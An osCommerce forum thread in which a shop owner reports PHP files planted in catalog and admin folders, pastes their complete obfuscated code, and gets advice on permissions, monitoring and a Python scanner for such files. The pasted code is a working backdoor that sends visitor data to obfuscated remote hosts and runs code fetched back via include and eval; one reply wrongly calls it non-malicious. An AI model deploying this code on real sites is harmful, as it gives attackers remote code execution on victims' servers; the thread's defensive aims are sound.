osCommerce
Unusual files on catalog/admin directories


Qvomos

Posted

Hello folks, great Sunday to you all.

I was doing my bi-weekly cleanup and updates to the site when I noticed several files scattered throughout the catalog/admin directories.

They are all PHP files with names like 130283.php (catalog/download) or 86025.php (catalog/images) or 118071.php (catalog/admin/backups).

All have the same code:

================

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

================

I certainly did not put them in there so I am not sure what's happening. Have I been hacked or something?

Any help someone can possibly give would be much appreciated.

Thank you in advance

 

Jayme

Posted

Yes, you're a hack victim.

 

Probably because your images folder has 777 permissions.

 

No web accessible folder should have permissions higher than 755

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Posted

From what I've been able to gather it's not a malicious nor destructive hack.

 

It's a "pay per click" scam.

 

This hack plants these files then seeds search engines with links to these files.

 

Then whomever runs the scam just sits back and gets paid for every click someone uses that leads to these files.

 

It happened to the site I manage back in March.

:blush:

 

Be sure you check ALL your folders for these bogus files.

 

If you change the images folder permissions to 755 and get an error in your osC admin about the images folder not being writable, as far as I know you have two options:

 

1. Use your cpanel to change the permissions to 777 while you're adding/updating categories and products and pray a hacking robot doesn't get you again while you're doing this.

 

2. Install a contribution called "osCFileBrowser". Using this contrib you must upload images in advance to your images folder (via FTP, Cpanel or whatever) and in your admin you have a window to the images folder that will popup and you pick the image.

 

There may be other ways.

 

If you want the link to the contribution I can find it.

 

That's the route I took to solve the problem.

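A defender-side check for the two things the post above calls for: looking in every folder for dropped PHP files and keeping web-accessible directories at 755 or below. This is an added example, not code from the thread or from osCommerce; it builds a throwaway sample tree to scan, and DATA_DIRS, SUSPECT_TOKENS and scan_tree are names of my own.

```python
import os
import re
import stat
import tempfile

# Upload/data directories of a stock osCommerce catalog; PHP never belongs in them.
DATA_DIRS = {"images", "download", "backups"}
# Traits of the dropper posted in the thread: decoded remote URL, fetched code passed to eval().
SUSPECT_TOKENS = ("base64_decode(", "eval(", "curl_init(")
NUMERIC_PHP = re.compile(r"^\d+\.php$")


def scan_tree(root):
    """Return (suspicious_php, world_writable_dirs) under root, paths relative to root."""
    suspicious, writable = [], []
    for dirpath, _dirs, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if stat.S_IMODE(os.stat(dirpath).st_mode) & stat.S_IWOTH:
            writable.append(rel_dir)  # mode above 755, e.g. the 777 images folder
        in_data_dir = bool(DATA_DIRS & set(rel_dir.split(os.sep)))
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if NUMERIC_PHP.match(name):
                reasons.append("numeric filename")
            if in_data_dir:
                reasons.append("php in data dir")
            with open(path, "rb") as fh:
                head = fh.read(65536).decode("latin-1")
            hits = [t for t in SUSPECT_TOKENS if t in head]
            if len(hits) >= 2:
                reasons.append("remote-code pattern: " + ", ".join(hits))
            if reasons:
                suspicious.append((os.path.relpath(path, root), reasons))
    return sorted(suspicious), sorted(writable)


def demo():
    """Build a constructed sample tree (not a real shop) and scan it."""
    root = tempfile.mkdtemp()
    images, includes = (os.path.join(root, "catalog", d) for d in ("images", "includes"))
    os.makedirs(images)
    os.makedirs(includes)
    os.chmod(images, 0o777)  # the weak setting the thread warns about
    with open(os.path.join(images, "86025.php"), "w") as fh:  # constructed dropper stub
        fh.write('<? $c=file_get_contents(base64_decode("aHR0cDovLw=="));eval($c); ?>')
    with open(os.path.join(includes, "application_top.php"), "w") as fh:  # benign file
        fh.write("<?php require('configure.php'); ?>")
    return scan_tree(root)
```

Run scan_tree against the real catalog root on a copy of the site, and treat any hit as something to review by hand before deleting.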

Posted

In addition to Jim's advice, install Jack's SiteMonitor contribution so you can get immediate notification of any file changes or additions on your server.

Posted

Thanks again Jim.

From what I understand on your note it doesn't sound too malicious in nature.

However, I do sell digital downloads and they are very unique and sought after. I did have one of those files inside the catalog/download folder. Any possibility that my inventory was downloaded?

Thanks again for all the information you have given me.

I have cleaned up all the directories and taken the appropriate measures to ensure this will not happen again, including installation of the mods you suggested.

Thank you too Spax :)

 

Cheers

 

Jayme

Posted

If this is the hack I think it is, its only purpose is a pay per click scam.

 

I doubt inventory was compromised.

 

If you use Paypal as a payment option there is a way people can trick osC into thinking the download has been paid for and they get the download for free.

 

Just thought I'd toss that in in case you didn't know that.

 

There is a thread around here discussing this very subject.


Posted

I am using PayPal IPN 2.33 and yes I did see this infamous post. I tried it on the site with no success. I believe the checkout process is fundamental for this hack to work but somehow I wasn't able to bring out the page during my attempts. I could be wrong but I've read the IPN is the key to safeguard against this hack.
